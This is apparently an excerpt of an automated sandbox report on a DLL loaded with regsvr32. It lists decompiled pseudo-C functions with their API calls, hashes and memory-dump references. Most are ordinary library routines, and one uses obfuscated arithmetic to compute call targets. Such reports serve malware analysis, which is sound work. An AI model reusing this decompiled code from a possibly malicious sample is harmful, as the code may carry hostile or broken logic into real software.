                                                                        				_t76 =  *((intOrPtr*)(_t71 + 0x88));
                                                                        				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
                                                                        					goto L6;
                                                                        				} else {
                                                                        					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
                                                                        					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                                                        					 *((intOrPtr*)( *_t74 + 0x144))(1);
                                                                        					goto L13;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10033BB6
                                                                          • Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524
                                                                        • GetWindowLongA.USER32 ref: 10033C57
                                                                        • UpdateWindow.USER32(?), ref: 10033C70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParentUpdate
                                                                        • String ID: P
                                                                        • API String ID: 1906497633-3110715001
                                                                        • Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                        • Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
                                                                        • Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                        • Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				intOrPtr _t10;
                                                                        				long _t12;
                                                                        				void* _t13;
                                                                        				CHAR* _t16;
                                                                        				void* _t30;
                                                                        				void* _t33;
                                                                        
                                                                        				_t10 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t10;
                                                                        				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
                                                                        				if(_t12 == 0 || _t12 == 0x104) {
                                                                        					L4:
                                                                        					_t13 = 0;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_push(__edi);
                                                                        					_t16 = PathFindExtensionA( &_v276);
                                                                        					asm("movsd");
                                                                        					asm("movsw");
                                                                        					asm("movsb");
                                                                        					_pop(_t30);
                                                                        					_pop(_t33);
                                                                        					if(_t16 -  &_v276 + 7 > 0x104) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						lstrcpyA(_t16,  &_v16);
                                                                        						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t13, _v8);
                                                                        			}













                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 10034C98
                                                                        • lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2
                                                                          • Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                          • Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                          • Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                        • String ID: %s.dll
                                                                        • API String ID: 4178508759-3668843792
                                                                        • Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                        • Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
                                                                        • Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                        • Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 59%
                                                                        			E100364C3() {
                                                                        				signed short _v16;
                                                                        				signed short _v20;
                                                                        				char _v24;
                                                                        				signed int _t6;
                                                                        				intOrPtr* _t16;
                                                                        				signed int _t19;
                                                                        
                                                                        				_t6 =  *0x1004b8c8; // 0xffffffff
                                                                        				if(_t6 != 0xffffffff) {
                                                                        					return _t6;
                                                                        				}
                                                                        				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
                                                                        				_t19 = 0x40000;
                                                                        				if(_t16 != 0) {
                                                                        					E10011C50( &_v24, 0, 0x14);
                                                                        					_push( &_v24);
                                                                        					_v24 = 0x14;
                                                                        					if( *_t16() >= 0) {
                                                                        						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                                                                        					}
                                                                        				}
                                                                        				 *0x1004b8c8 = _t19;
                                                                        				return _t19;
                                                                        			}










                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: COMCTL32.DLL$DllGetVersion
                                                                        • API String ID: 1646373207-1518460440
                                                                        • Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                        • Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
                                                                        • Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                        • Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v20;
                                                                        				intOrPtr _t9;
                                                                        				signed int _t17;
                                                                        
                                                                        				_t9 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t9;
                                                                        				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
                                                                        					_t10 = 0;
                                                                        				} else {
                                                                        					GetClassNameA(_a4,  &_v20, 0xa);
                                                                        					_t17 = lstrcmpiA( &_v20, "combobox");
                                                                        					asm("sbb eax, eax");
                                                                        					_t10 =  ~_t17 + 1;
                                                                        				}
                                                                        				return E100117AE(_t10, _v8);
                                                                        			}








                                                                        APIs
                                                                        • GetWindowLongA.USER32 ref: 10029AA7
                                                                        • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                        • lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ClassLongNameWindowlstrcmpi
                                                                        • String ID: combobox
                                                                        • API String ID: 2054663530-2240613097
                                                                        • Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                        • Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
                                                                        • Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                        • Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E10019599(void* __eflags) {
                                                                        				_Unknown_base(*)()* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				void* _t13;
                                                                        				void* _t14;
                                                                        				void* _t15;
                                                                        				void* _t16;
                                                                        
                                                                        				_push(0x10);
                                                                        				_push(0x10042d28);
                                                                        				E10012514(_t13, _t14, _t15);
                                                                        				_t9 =  *0x1004f820;
                                                                        				if(_t9 == 0) {
                                                                        					if( *0x1004f3e0 == 1) {
                                                                        						L4:
                                                                        						_t9 = 0x10019589;
                                                                        						 *0x1004f820 = 0x10019589;
                                                                        					} else {
                                                                        						_t12 = GetModuleHandleA("kernel32.dll");
                                                                        						if(_t12 == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
                                                                        							 *0x1004f820 = _t9;
                                                                        							if(_t9 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
                                                                        				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
                                                                        				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
                                                                        				return E1001254F(_t10);
                                                                        			}










                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC
                                                                        Strings
                                                                        • kernel32.dll, xrefs: 100195B7
                                                                        • InitializeCriticalSectionAndSpinCount, xrefs: 100195C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                        • API String ID: 1646373207-3733552308
                                                                        • Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                        • Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
                                                                        • Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                        • Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E10004DD0() {
                                                                        				void* _t51;
                                                                        				signed int _t53;
                                                                        				signed int _t59;
                                                                        				signed int _t61;
                                                                        				intOrPtr _t82;
                                                                        				signed int _t96;
                                                                        				signed int _t103;
                                                                        				signed int _t111;
                                                                        				signed int _t112;
                                                                        				signed int _t120;
                                                                        				signed int _t121;
                                                                        				signed int _t125;
                                                                        				signed int _t132;
                                                                        				signed int _t139;
                                                                        				signed int _t142;
                                                                        				signed int _t151;
                                                                        				intOrPtr _t157;
                                                                        				signed int _t159;
                                                                        				signed int _t162;
                                                                        				signed int _t163;
                                                                        				void* _t164;
                                                                        				signed int _t166;
                                                                        				signed int _t173;
                                                                        				signed int _t177;
                                                                        				signed int _t189;
                                                                        				void* _t195;
                                                                        				void* _t196;
                                                                        
                                                                        				_t164 =  *(_t195 + 0xc);
                                                                        				if(_t164 != 0) {
                                                                        					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
                                                                        						_t132 =  *0x1004b0e0; // 0x0
                                                                        						_t103 =  *0x1004b0dc; // 0x0
                                                                        						_t151 =  *0x1004b0e8; // 0x0
                                                                        						_t162 =  *0x1004b0e4; // 0x0
                                                                        						_t82 =  *((intOrPtr*)(_t164 + 4));
                                                                        						_t163 =  *0x1004b0ec; // 0x0
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
                                                                        					}
                                                                        					_t111 =  *0x1004b0dc; // 0x0
                                                                        					_t53 =  *0x1004b0e8; // 0x0
                                                                        					_t166 =  *0x1004b0ec; // 0x0
                                                                        					_t10 = _t111 + 1; // 0x1
                                                                        					_t112 =  *0x1004b0e0; // 0x0
                                                                        					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
                                                                        					_t196 = _t195 + 4;
                                                                        					if( *((intOrPtr*)(_t164 + 8)) == 0) {
                                                                        						L9:
                                                                        						_t157 =  *((intOrPtr*)(_t164 + 4));
                                                                        						if(_t157 != 0) {
                                                                        							_t59 =  *0x1004b0dc; // 0x0
                                                                        							_t120 =  *0x1004b0ec; // 0x0
                                                                        							_t139 =  *0x1004b0e8; // 0x0
                                                                        							_t121 =  *0x1004b0e0; // 0x0
                                                                        							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
                                                                        						}
                                                                        						return HeapFree(GetProcessHeap(), 0, _t164);
                                                                        					} else {
                                                                        						_t125 =  *0x1004b0e0; // 0x0
                                                                        						_t159 =  *0x1004b0ec; // 0x0
                                                                        						_t173 =  *0x1004b0dc; // 0x0
                                                                        						_t142 =  *0x1004b0d8; // 0x0
                                                                        						_t61 =  *0x1004b0e4; // 0x0
                                                                        						_t12 = _t125 + 1; // 0x1
                                                                        						 *(_t196 + 0x18) = 0;
                                                                        						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
                                                                        							L8:
                                                                        							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
                                                                        							_t196 = _t196 + 4;
                                                                        							goto L9;
                                                                        						} else {
                                                                        							goto L5;
                                                                        						}
                                                                        						do {
                                                                        							L5:
                                                                        							_t96 =  *0x1004b0dc; // 0x0
                                                                        							_t177 =  *0x1004b0e8; // 0x0
                                                                        							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
                                                                        							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
                                                                        								_t189 =  *0x1004b0e4; // 0x0
                                                                        								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
                                                                        								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
                                                                        								_t142 =  *0x1004b0d8; // 0x0
                                                                        								_t159 =  *0x1004b0ec; // 0x0
                                                                        								_t125 =  *0x1004b0e0; // 0x0
                                                                        								_t96 =  *0x1004b0dc; // 0x0
                                                                        								_t196 = _t196 + 8;
                                                                        							}
                                                                        							_t61 =  *0x1004b0e4; // 0x0
                                                                        							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
                                                                        							_t37 = _t125 + 1; // 0x1
                                                                        						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
                                                                        						goto L8;
                                                                        					}
                                                                        				}
                                                                        				return _t51;
                                                                        			}


                                                                        APIs
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10004E6C
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10004FB4
                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
                                                                        • HeapFree.KERNEL32(00000000), ref: 1000502F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@Heap$FreeProcess
                                                                        • String ID:
                                                                        • API String ID: 834397476-0
                                                                        • Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                        • Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
                                                                        • Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                        • Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1001B36C(signed int _a4, signed int _a8, long _a12) {
                                                                        				void _v5;
                                                                        				signed int _v12;
                                                                        				long _v16;
                                                                        				signed int _t79;
                                                                        				void* _t82;
                                                                        				signed int _t86;
                                                                        				signed int* _t89;
                                                                        				long _t90;
                                                                        				void* _t92;
                                                                        				intOrPtr _t93;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				char _t100;
                                                                        				signed int _t101;
                                                                        				long _t103;
                                                                        				long _t106;
                                                                        				signed int _t107;
                                                                        				signed int _t113;
                                                                        				signed int _t114;
                                                                        				signed char _t117;
                                                                        				intOrPtr _t118;
                                                                        				long _t120;
                                                                        				void* _t124;
                                                                        				intOrPtr* _t125;
                                                                        				signed int _t127;
                                                                        				signed char* _t128;
                                                                        				void* _t129;
                                                                        				void* _t130;
                                                                        
                                                                        				_v12 = _v12 & 0x00000000;
                                                                        				_t113 = _a8;
                                                                        				_t124 = _t113;
                                                                        				if(_a12 == 0) {
                                                                        					L42:
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				}
                                                                        				_t79 = _a4;
                                                                        				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
                                                                        				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
                                                                        				_t82 =  *_t125 + _t127;
                                                                        				_t117 =  *((intOrPtr*)(_t82 + 4));
                                                                        				if((_t117 & 0x00000002) != 0) {
                                                                        					goto L42;
                                                                        				}
                                                                        				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
                                                                        					_a12 = _a12 - 1;
                                                                        					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
                                                                        					_t124 = _t113 + 1;
                                                                        					_v12 = 1;
                                                                        					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
                                                                        				}
                                                                        				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
                                                                        					_t86 = _v16;
                                                                        					_t118 =  *_t125;
                                                                        					_v12 = _v12 + _t86;
                                                                        					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
                                                                        					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
                                                                        						L41:
                                                                        						return _v12;
                                                                        					}
                                                                        					__eflags = _t86;
                                                                        					if(_t86 == 0) {
                                                                        						L15:
                                                                        						_t89 =  *_t125 + _t127 + 4;
                                                                        						 *_t89 =  *_t89 & 0x000000fb;
                                                                        						__eflags =  *_t89;
                                                                        						L16:
                                                                        						_t90 = _a8;
                                                                        						_t120 = _v12 + _t90;
                                                                        						__eflags = _t90 - _t120;
                                                                        						_a12 = _t90;
                                                                        						_v12 = _t120;
                                                                        						if(_t90 >= _t120) {
                                                                        							L40:
                                                                        							_t114 = _t113 - _a8;
                                                                        							__eflags = _t114;
                                                                        							_v12 = _t114;
                                                                        							goto L41;
                                                                        						} else {
                                                                        							goto L17;
                                                                        						}
                                                                        						while(1) {
                                                                        							L17:
                                                                        							_t92 =  *_a12;
                                                                        							__eflags = _t92 - 0x1a;
                                                                        							if(_t92 == 0x1a) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags = _t92 - 0xd;
                                                                        							if(_t92 == 0xd) {
                                                                        								__eflags = _a12 - _t120 - 1;
                                                                        								if(_a12 >= _t120 - 1) {
                                                                        									_a12 = _a12 + 1;
                                                                        									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
                                                                        									__eflags = _t97;
                                                                        									if(_t97 != 0) {
                                                                        										L26:
                                                                        										__eflags = _v16;
                                                                        										if(_v16 == 0) {
                                                                        											L34:
                                                                        											 *_t113 = 0xd;
                                                                        											L35:
                                                                        											_t113 = _t113 + 1;
                                                                        											__eflags = _t113;
                                                                        											L36:
                                                                        											_t120 = _v12;
                                                                        											__eflags = _a12 - _t120;
                                                                        											if(_a12 < _t120) {
                                                                        												continue;
                                                                        											}
                                                                        											goto L40;
                                                                        										}
                                                                        										_t98 =  *_t125;
                                                                        										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
                                                                        										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
                                                                        											__eflags = _t113 - _a8;
                                                                        											if(__eflags != 0) {
                                                                        												L33:
                                                                        												E1001968C(__eflags, _a4, 0xffffffff, 1);
                                                                        												_t130 = _t130 + 0xc;
                                                                        												__eflags = _v5 - 0xa;
                                                                        												if(_v5 == 0xa) {
                                                                        													goto L36;
                                                                        												}
                                                                        												goto L34;
                                                                        											}
                                                                        											__eflags = _v5 - 0xa;
                                                                        											if(__eflags != 0) {
                                                                        												goto L33;
                                                                        											}
                                                                        											L32:
                                                                        											 *_t113 = 0xa;
                                                                        											goto L35;
                                                                        										}
                                                                        										_t100 = _v5;
                                                                        										__eflags = _t100 - 0xa;
                                                                        										if(_t100 == 0xa) {
                                                                        											goto L32;
                                                                        										}
                                                                        										 *_t113 = 0xd;
                                                                        										 *((char*)( *_t125 + _t127 + 5)) = _t100;
                                                                        										goto L35;
                                                                        									}
                                                                        									_t101 = GetLastError();
                                                                        									__eflags = _t101;
                                                                        									if(_t101 != 0) {
                                                                        										goto L34;
                                                                        									}
                                                                        									goto L26;
                                                                        								}
                                                                        								_t103 = _a12 + 1;
                                                                        								__eflags =  *_t103 - 0xa;
                                                                        								if( *_t103 != 0xa) {
                                                                        									_a12 = _t103;
                                                                        									goto L34;
                                                                        								}
                                                                        								_a12 = _a12 + 2;
                                                                        								goto L32;
                                                                        							}
                                                                        							 *_t113 = _t92;
                                                                        							_t113 = _t113 + 1;
                                                                        							_a12 = _a12 + 1;
                                                                        							goto L36;
                                                                        						}
                                                                        						_t93 =  *_t125;
                                                                        						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
                                                                        						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
                                                                        							_t128 = _t93 + _t127 + 4;
                                                                        							 *_t128 =  *_t128 | 0x00000002;
                                                                        							__eflags =  *_t128;
                                                                        						}
                                                                        						goto L40;
                                                                        					}
                                                                        					__eflags =  *_t113 - 0xa;
                                                                        					if( *_t113 != 0xa) {
                                                                        						goto L15;
                                                                        					}
                                                                        					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
                                                                        					goto L16;
                                                                        				} else {
                                                                        					_t106 = GetLastError();
                                                                        					_t129 = 5;
                                                                        					if(_t106 != _t129) {
                                                                        						__eflags = _t106 - 0x6d;
                                                                        						if(_t106 == 0x6d) {
                                                                        							goto L42;
                                                                        						}
                                                                        						_t107 = E10013707(_t106);
                                                                        						L10:
                                                                        						return _t107 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(E100136F5())) = 9;
                                                                        					_t107 = E100136FE();
                                                                        					 *_t107 = _t129;
                                                                        					goto L10;
                                                                        				}
                                                                        			}
































                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
                                                                        • GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
                                                                        • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
                                                                        • GetLastError.KERNEL32(?,?,?), ref: 1001B4C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
